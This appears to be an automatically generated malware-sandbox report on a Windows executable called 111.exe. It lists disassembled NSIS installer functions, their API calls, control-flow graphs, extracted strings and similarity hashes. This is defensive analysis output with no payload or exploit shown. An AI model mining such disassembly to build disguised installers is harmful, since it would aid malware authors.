                                                                                                                              • Opcode ID: d511c024af8fdc6ff868d432ce58507b2a66eda6578bf5e7436de137c1c2de65
                                                                                                                              • Instruction ID: 64ad53015563eb9bad7c636b6f780160dd5a6986b89d0419f795064a900c36f2
                                                                                                                              • Opcode Fuzzy Hash: d511c024af8fdc6ff868d432ce58507b2a66eda6578bf5e7436de137c1c2de65
                                                                                                                              • Instruction Fuzzy Hash: 8941B330804B18AAEB21AB658D89AAF7778EF41714F24417FF802B11D1D77C5E81DE6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040676F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNELBASE(75923420,004302B8,C:\,00405E37,C:\,C:\,00000000,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040677A
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406786
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                              • String ID: C:\
                                                                                                                              • API String ID: 2295610775-3404278061
                                                                                                                              • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                              • Instruction ID: c6bcef3f8635fd9f58624a192a3d19c105278d067f6c5fe4f3eb3d2c281a06a9
                                                                                                                              • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                              • Instruction Fuzzy Hash: F0D012315242206FC3805B386E0C84B7A989F16335B218B36B4AAF21E0D7349C3287BC
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004021A2 Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInstance
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 542301482-0
                                                                                                                              • Opcode ID: 232fa026ef0979d97a93aa6195f8e5819eb62f66f95c93cff0119e6fdfb840f1
                                                                                                                              • Instruction ID: 552a380bc1a798379165a166047c46cc7e7689cdd056a509842d4882e8d45c12
                                                                                                                              • Opcode Fuzzy Hash: 232fa026ef0979d97a93aa6195f8e5819eb62f66f95c93cff0119e6fdfb840f1
                                                                                                                              • Instruction Fuzzy Hash: 33410875A00208AFCF00DFE4C989A9E7BB6FF48314B20457AF515EB2D1DB799981CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403E8E Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 188 403e8e-403ea0 189 403fe1-403ff0 188->189 190 403ea6-403eac 188->190 192 403ff2-40403a GetDlgItem * 2 call 404367 SetClassLongW call 40140b 189->192 193 40403f-404054 189->193 190->189 191 403eb2-403ebb 190->191 194 403ed0-403ed3 191->194 195 403ebd-403eca SetWindowPos 191->195 192->193 197 404094-404099 call 4043b3 193->197 198 404056-404059 193->198 202 403ed5-403ee7 ShowWindow 194->202 203 403eed-403ef3 194->203 195->194 207 40409e-4040b9 197->207 199 40405b-404066 call 401389 198->199 200 40408c-40408e 198->200 199->200 221 404068-404087 SendMessageW 199->221 200->197 206 404334 200->206 202->203 208 403ef5-403f0a DestroyWindow 203->208 209 403f0f-403f12 203->209 214 404336-40433d 206->214 212 4040c2-4040c8 207->212 213 4040bb-4040bd call 40140b 207->213 215 404311-404317 208->215 217 403f14-403f20 SetWindowLongW 209->217 218 403f25-403f2b 209->218 224 4042f2-40430b DestroyWindow KiUserCallbackDispatcher 212->224 225 4040ce-4040d9 212->225 213->212 215->206 223 404319-40431f 215->223 217->214 219 403f31-403f42 GetDlgItem 218->219 220 403fce-403fdc call 4043ce 218->220 226 403f61-403f64 219->226 227 403f44-403f5b SendMessageW IsWindowEnabled 219->227 220->214 221->214 223->206 229 404321-40432a ShowWindow 223->229 224->215 225->224 230 4040df-40412c call 40644e call 404367 * 3 GetDlgItem 225->230 231 403f66-403f67 226->231 232 403f69-403f6c 226->232 227->206 227->226 229->206 258 404136-404172 ShowWindow KiUserCallbackDispatcher call 404389 KiUserCallbackDispatcher 230->258 259 40412e-404133 230->259 235 403f97-403f9c call 404340 231->235 236 403f7a-403f7f 232->236 237 403f6e-403f74 232->237 235->220 239 403fb5-403fc8 SendMessageW 236->239 241 403f81-403f87 236->241 237->239 240 403f76-403f78 237->240 239->220 240->235 245 403f89-403f8f call 40140b 241->245 246 403f9e-403fa7 call 40140b 241->246 256 403f95 245->256 246->220 255 403fa9-403fb3 246->255 255->256 256->235 262 404174-404175 258->262 263 404177 258->263 259->258 264 404179-4041a7 GetSystemMenu EnableMenuItem SendMessageW 262->264 263->264 265 4041a9-4041ba SendMessageW 264->265 266 4041bc 264->266 267 4041c2-404201 call 40439c call 403e6f call 406411 lstrlenW call 40644e SetWindowTextW call 401389 265->267 266->267 267->207 278 404207-404209 267->278 278->207 279 40420f-404213 278->279 280 404232-404246 DestroyWindow 279->280 281 404215-40421b 279->281 280->215 283 40424c-404279 CreateDialogParamW 280->283 281->206 282 404221-404227 281->282 282->207 285 40422d 282->285 283->215 284 40427f-4042d6 call 404367 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 283->284 284->206 290 4042d8-4042eb ShowWindow call 4043b3 284->290 285->206 292 4042f0 290->292 292->215
                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403ECA
                                                                                                                              • ShowWindow.USER32(?), ref: 00403EE7
                                                                                                                              • DestroyWindow.USER32 ref: 00403EFB
                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F17
                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F38
                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F4C
                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F53
                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00404001
                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0040400B
                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404025
                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404076
                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 0040411C
                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040413D
                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040414F
                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040416A
                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404180
                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404187
                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040419F
                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041B2
                                                                                                                              • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 004041DC
                                                                                                                              • SetWindowTextW.USER32(?,0042D268), ref: 004041F0
                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404324
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Item$MessageSend$Show$CallbackDispatcherLongMenuUser$ClassDestroyEnableEnabledSystemTextlstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1252290697-0
                                                                                                                              • Opcode ID: 9f4b89b181f7ea2427412b6a5e1e41d5f9313a160c091d4bdffc9bb879b1fb5a
                                                                                                                              • Instruction ID: cb6f0490afd218b95da4ce8f8645ed9f2a2dc6dad26b5163c80864a666f03042
                                                                                                                              • Opcode Fuzzy Hash: 9f4b89b181f7ea2427412b6a5e1e41d5f9313a160c091d4bdffc9bb879b1fb5a
                                                                                                                              • Instruction Fuzzy Hash: 40C1AFB1600305EFDB206F61EE85E2B7A68FB85706B54053EFA81B11F0CB799841DB2D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403AE0 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215stringregistryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 293 403ae0-403af8 call 406806 296 403afa-403b0a call 406358 293->296 297 403b0c-403b43 call 4062df 293->297 305 403b66-403b8f call 403db6 call 405dee 296->305 302 403b45-403b56 call 4062df 297->302 303 403b5b-403b61 lstrcatW 297->303 302->303 303->305 311 403c21-403c29 call 405dee 305->311 312 403b95-403b9a 305->312 318 403c37-403c5c LoadImageW 311->318 319 403c2b-403c32 call 40644e 311->319 312->311 313 403ba0-403bba call 4062df 312->313 317 403bbf-403bc8 313->317 317->311 320 403bca-403bce 317->320 322 403cdd-403ce5 call 40140b 318->322 323 403c5e-403c8e RegisterClassW 318->323 319->318 327 403be0-403bec lstrlenW 320->327 328 403bd0-403bdd call 405d13 320->328 335 403ce7-403cea 322->335 336 403cef-403cfa call 403db6 322->336 324 403c94-403cd8 SystemParametersInfoW CreateWindowExW 323->324 325 403dac 323->325 324->322 333 403dae-403db5 325->333 329 403c14-403c1c call 405ce6 call 406411 327->329 330 403bee-403bfc lstrcmpiW 327->330 328->327 329->311 330->329 334 403bfe-403c08 GetFileAttributesW 330->334 339 403c0a-403c0c 334->339 340 403c0e-403c0f call 405d32 334->340 335->333 346 403d00-403d1a ShowWindow call 406796 336->346 347 403d83-403d84 call 40554c 336->347 339->329 339->340 340->329 354 403d26-403d38 GetClassInfoW 346->354 355 403d1c-403d21 call 406796 346->355 350 403d89-403d8b 347->350 352 403da5-403da7 call 40140b 350->352 353 403d8d-403d93 350->353 352->325 353->335 356 403d99-403da0 call 40140b 353->356 359 403d50-403d73 DialogBoxParamW call 40140b 354->359 360 403d3a-403d4a GetClassInfoW RegisterClassW 354->360 355->354 356->335 363 403d78-403d81 call 403a30 359->363 360->359 363->333
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                                                                                • Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                                                                              • lstrcatW.KERNEL32(1033,0042D268), ref: 00403B61
                                                                                                                              • lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420), ref: 00403BE1
                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403BF4
                                                                                                                              • GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403BFF
                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00440800), ref: 00403C48
                                                                                                                                • Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365
                                                                                                                              • RegisterClassW.USER32(00433EA0), ref: 00403C85
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C9D
                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CD2
                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D08
                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403D34
                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403D41
                                                                                                                              • RegisterClassW.USER32(00433EA0), ref: 00403D4A
                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E8E,00000000), ref: 00403D69
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                              • API String ID: 1975747703-2517885331
                                                                                                                              • Opcode ID: 307c7652489d2e693200f1b5be79fe2e5cdae1af6675f2621be9ce74e47a8bbd
                                                                                                                              • Instruction ID: ef062d508cd4fc62497976b4bc03dd7eae2cd9e8a178e807e7972486bae2ade7
                                                                                                                              • Opcode Fuzzy Hash: 307c7652489d2e693200f1b5be79fe2e5cdae1af6675f2621be9ce74e47a8bbd
                                                                                                                              • Instruction Fuzzy Hash: 9A61B8711447006EE320AF66AE46F2B3A6CEBC5B4AF40453FF941B61E1DB7D9901CA2D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040644E Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 209stringCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 470 40644e-406459 471 40645b-40646a 470->471 472 40646c-406482 470->472 471->472 473 406488-406495 472->473 474 40669a-4066a0 472->474 473->474 475 40649b-4064a2 473->475 476 4066a6-4066b1 474->476 477 4064a7-4064b4 474->477 475->474 479 4066b3-4066b7 call 406411 476->479 480 4066bc-4066bd 476->480 477->476 478 4064ba-4064c6 477->478 481 406687 478->481 482 4064cc-40650a 478->482 479->480 486 406695-406698 481->486 487 406689-406693 481->487 484 406510-40651b 482->484 485 40662a-40662e 482->485 488 406534 484->488 489 40651d-406522 484->489 490 406630-406636 485->490 491 406661-406665 485->491 486->474 487->474 497 40653b-406542 488->497 489->488 494 406524-406527 489->494 495 406646-406652 call 406411 490->495 496 406638-406644 call 406358 490->496 492 406674-406685 lstrlenW 491->492 493 406667-40666f call 40644e 491->493 492->474 493->492 494->488 499 406529-40652c 494->499 504 406657-40665d 495->504 496->504 501 406544-406546 497->501 502 406547-406549 497->502 499->488 505 40652e-406532 499->505 501->502 507 406584-406587 502->507 508 40654b-406569 call 4062df 502->508 504->492 510 40665f 504->510 505->497 511 406597-40659a 507->511 512 406589-406595 GetSystemDirectoryW 507->512 513 40656e-406572 508->513 514 406622-406628 call 4066c0 510->514 516 406605-406607 511->516 517 40659c-4065aa GetWindowsDirectoryW 511->517 515 406609-40660d 512->515 518 406612-406615 513->518 519 406578-40657f call 40644e 513->519 514->492 515->514 521 40660f 515->521 516->515 520 4065ac-4065b6 516->520 517->516 518->514 524 406617-40661d lstrcatW 518->524 519->515 526 4065d0-4065e6 SHGetSpecialFolderLocation 520->526 527 4065b8-4065bb 520->527 521->518 524->514 530 406601 526->530 531 4065e8-4065ff SHGetPathFromIDListW CoTaskMemFree 526->531 527->526 529 4065bd-4065c4 527->529 532 4065cc-4065ce 529->532 530->516 531->515 531->530 532->515 532->526
                                                                                                                              APIs
                                                                                                                              • GetSystemDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 0040658F
                                                                                                                              • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00000400,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,?,004054B0,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000), ref: 004065A2
                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(004054B0,0084A184,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,?,004054B0,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000), ref: 004065DE
                                                                                                                              • SHGetPathFromIDListW.SHELL32(0084A184,Remove folder: ), ref: 004065EC
                                                                                                                              • CoTaskMemFree.OLE32(0084A184), ref: 004065F7
                                                                                                                              • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040661D
                                                                                                                              • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,?,004054B0,Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\,00000000), ref: 00406675
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                              • String ID: Admin$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                              • API String ID: 717251189-6991435
                                                                                                                              • Opcode ID: 5fd5f62acfbc750a5bfa13b67a53bf5d96f1c0a3e796ecc305639f8f1b5e8061
                                                                                                                              • Instruction ID: cd0f296135d024e5542a1133132ccafb23cc3a0c8fe84acec88ebf75cbd5934e
                                                                                                                              • Opcode Fuzzy Hash: 5fd5f62acfbc750a5bfa13b67a53bf5d96f1c0a3e796ecc305639f8f1b5e8061
                                                                                                                              • Instruction Fuzzy Hash: 9C614471A00111AADF208F54DD41BBE37A5AF44314F26853FE943B62D0EB3E5AA2CB5D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403015 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 533 403015-403063 GetTickCount GetModuleFileNameW call 405f07 536 403065-40306a 533->536 537 40306f-40309d call 406411 call 405d32 call 406411 GetFileSize 533->537 538 403245-403249 536->538 545 4030a3 537->545 546 403188-403196 call 402fb1 537->546 548 4030a8-4030bf 545->548 552 403198-40319b 546->552 553 4031eb-4031f0 546->553 550 4030c1 548->550 551 4030c3-4030cc call 403467 548->551 550->551 559 4031f2-4031fa call 402fb1 551->559 560 4030d2-4030d9 551->560 555 40319d-4031b5 call 40347d call 403467 552->555 556 4031bf-4031e9 GlobalAlloc call 40347d call 40324c 552->556 553->538 555->553 579 4031b7-4031bd 555->579 556->553 584 4031fc-40320d 556->584 559->553 564 403155-403159 560->564 565 4030db-4030ef call 405ec2 560->565 569 403163-403169 564->569 570 40315b-403162 call 402fb1 564->570 565->569 582 4030f1-4030f8 565->582 575 403178-403180 569->575 576 40316b-403175 call 4068f3 569->576 570->569 575->548 583 403186 575->583 576->575 579->553 579->556 582->569 588 4030fa-403101 582->588 583->546 585 403215-40321a 584->585 586 40320f 584->586 589 40321b-403221 585->589 586->585 588->569 590 403103-40310a 588->590 589->589 591 403223-40323e SetFilePointer call 405ec2 589->591 590->569 592 40310c-403113 590->592 596 403243 591->596 592->569 593 403115-403135 592->593 593->553 595 40313b-40313f 593->595 597 403141-403145 595->597 598 403147-40314f 595->598 596->538 597->583 597->598 598->569 599 403151-403153 598->599 599->569
                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00403026
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\Public\111.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                                                                                • Part of subcall function 00405F07: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\Public\111.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                                                                                • Part of subcall function 00405F07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\Public\111.exe,C:\Users\Public\111.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2249498923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000006.00000002.2249483338.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249515278.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.000000000042F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000436000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000442000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249531412.0000000000446000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000006.00000002.2249652066.0000000000449000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_111.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                              • String ID: C:\Users\Public\111.exe$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                              • API String ID: 2803837635-586163664
                                                                                                                              • Opcode ID: 625f1048dc6d86d39f3d78a898961fe191710334975853b35aad6397d9df675a
                                                                                                                              • Instruction ID: 352fdba277142773567f3d30b5bba7b1c47688a28dd7517ec43723b707c69b17
                                                                                                                              • Opcode Fuzzy Hash: 625f1048dc6d86d39f3d78a898961fe191710334975853b35aad6397d9df675a
